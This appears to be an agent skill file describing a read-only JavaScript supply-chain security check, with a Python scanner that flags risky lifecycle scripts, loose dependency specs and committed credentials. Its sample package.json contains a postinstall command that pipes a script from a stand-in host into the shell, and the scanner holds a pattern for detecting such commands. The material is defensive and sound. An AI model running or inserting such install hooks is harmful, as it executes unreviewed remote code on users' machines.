package-security-check

Package Security Check

Workflow

  1. Treat this as a base JS supply-chain check first. Do not force the result around one CVE, vendor, package family, or incident.
  2. Before running installs, package-manager mutation commands, or file edits, perform only read-only inspection and present a traffic-light issue analysis:
    • 🔴 Blocker: compromise signal, unsafe install path, secret exposure, or policy that allows unreviewed code execution.
    • 🟡 Risk: hardening gap, stale package-manager major, broad spec, lifecycle script needing review, or CI weakness.
    • 🟢 OK: verified control or no finding.
  3. After the traffic-light analysis, ask for approval before changing files or executing package-manager operations that can install, update, publish, or rewrite lockfiles.
  4. From this skill directory, run the baseline scanner against the repo or workspace root:

     ```bash
     python3 scripts/check_js_supply_chain.py --root <repo-or-workspace-root>
     ```

Use `--strict` when the check should fail on hardening gaps. Use `--json` when another tool needs machine-readable output. Use `--include-installed` only when `node_modules` exists and the lifecycle metadata of installed packages matters.
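The read-only inspection of step 2 and the scanner of step 4 can be illustrated with a small triage script. This is an added example, not the skill's own `scripts/check_js_supply_chain.py`: it reads only `package.json`, `.npmrc` and the lockfile under a root, never runs a package manager, and maps what it finds onto the 🔴/🟡/🟢 scheme above. The mapping of individual findings to colours (for example, a `curl | sh` lifecycle script as a blocker but any other lifecycle script as a risk) and the sample `package.json`/`.npmrc` (with the `example.invalid` host and a fake token) are constructed for the illustration and are assumptions, not the skill's policy.

```python
"""Read-only JS supply-chain triage (added example, not the skill's scanner)."""
import json
import re
import tempfile
from pathlib import Path

RED, YELLOW, GREEN = "🔴", "🟡", "🟢"

# Lifecycle hooks that execute code during install (reviewed in step 2).
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Shell fragments that fetch and run remote code: unreviewed code execution.
REMOTE_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b")
LOCKFILES = ("package-lock.json", "npm-shrinkwrap.json", "yarn.lock", "pnpm-lock.yaml")

# Constructed sample inputs for the demo; not taken from any real project.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "demo-app",
    "scripts": {
        "postinstall": "curl -s https://example.invalid/setup.sh | sh",
        "prepare": "husky",
    },
    "dependencies": {
        "left-pad": "*",
        "lodash": "^4.17.21",
        "internal-tool": "http://example.invalid/internal-tool.tgz",
    },
})
SAMPLE_NPMRC = (
    "registry=https://registry.npmjs.org/\n"
    "//registry.npmjs.org/:_authToken=npm_FAKE_TOKEN_1234\n"
)


def scan_package_json(pkg: dict) -> list:
    """Classify lifecycle scripts, dependency specs and package-manager pinning."""
    findings = []
    scripts = pkg.get("scripts", {})
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        if REMOTE_EXEC.search(cmd):
            findings.append((RED, f"{hook} fetches and executes remote code: {cmd}"))
        else:
            findings.append((YELLOW, f"{hook} lifecycle script needs review: {cmd}"))
    for field in ("dependencies", "devDependencies", "optionalDependencies"):
        for name, spec in pkg.get(field, {}).items():
            if spec.startswith("http://"):
                findings.append((RED, f"{name}: plaintext tarball URL {spec}"))
            elif spec.startswith(("git+", "git://", "github:", "https://")):
                findings.append((YELLOW, f"{name}: non-registry source {spec}; pin a commit and review"))
            elif spec in ("", "*", "latest", "x") or spec.startswith(">"):
                findings.append((YELLOW, f"{name}: broad spec '{spec}' allows unreviewed upgrades"))
    if "packageManager" in pkg:
        findings.append((GREEN, f"packageManager pinned: {pkg['packageManager']}"))
    else:
        findings.append((YELLOW, "no packageManager field; package-manager version is not pinned"))
    return findings


def scan_npmrc(text: str) -> list:
    """Look for committed credentials, plaintext registries and script hardening."""
    settings = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith((";", "#")):
            continue
        key, _, value = line.partition("=")
        settings[key.strip()] = value.strip()
    findings = []
    for key, value in settings.items():
        is_secret = key.endswith((":_authToken", ":_password")) or key == "_authToken"
        # A ${VAR} reference is resolved from the environment; a literal is a leak.
        if is_secret and value and not (value.startswith("${") and value.endswith("}")):
            findings.append((RED, f"{key} holds a literal credential in a committed file"))
        if key.endswith("registry") and value.startswith("http://"):
            findings.append((RED, f"{key} uses plaintext HTTP: {value}"))
    if settings.get("ignore-scripts", "").lower() == "true":
        findings.append((GREEN, "ignore-scripts=true: lifecycle scripts disabled by default"))
    else:
        findings.append((YELLOW, "ignore-scripts not set; lifecycle scripts run on install"))
    return findings


def scan_root(root: Path) -> list:
    """Read-only walk of the files that decide what an install will execute."""
    findings = []
    pkg_file = root / "package.json"
    if pkg_file.is_file():
        findings += scan_package_json(json.loads(pkg_file.read_text()))
    npmrc = root / ".npmrc"
    findings += scan_npmrc(npmrc.read_text() if npmrc.is_file() else "")
    if any((root / name).is_file() for name in LOCKFILES):
        findings.append((GREEN, "lockfile present"))
    else:
        findings.append((YELLOW, "no lockfile; installs are not reproducible"))
    return findings


def overall(findings: list) -> str:
    """Worst colour wins: one blocker makes the whole check a blocker."""
    levels = {level for level, _ in findings}
    return RED if RED in levels else YELLOW if YELLOW in levels else GREEN


def run_demo() -> list:
    """Write the constructed samples to a temp dir, scan them, print the report."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "package.json").write_text(SAMPLE_PACKAGE_JSON)
        (root / ".npmrc").write_text(SAMPLE_NPMRC)
        findings = scan_root(root)
    for level, message in findings:
        print(level, message)
    print("overall:", overall(findings))
    return findings


if __name__ == "__main__":
    run_demo()
```

On the constructed sample the script reports two blockers from `package.json` (the `curl | sh` postinstall and the plaintext tarball), one from `.npmrc` (the literal token), and several risks (broad `*` spec, unpinned package manager, missing `ignore-scripts`, no lockfile), so the overall result is 🔴 and, per step 3, no install or lockfile rewrite should proceed until those are resolved and approved.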

  5. For a specific active incident, add one or more IOC profiles: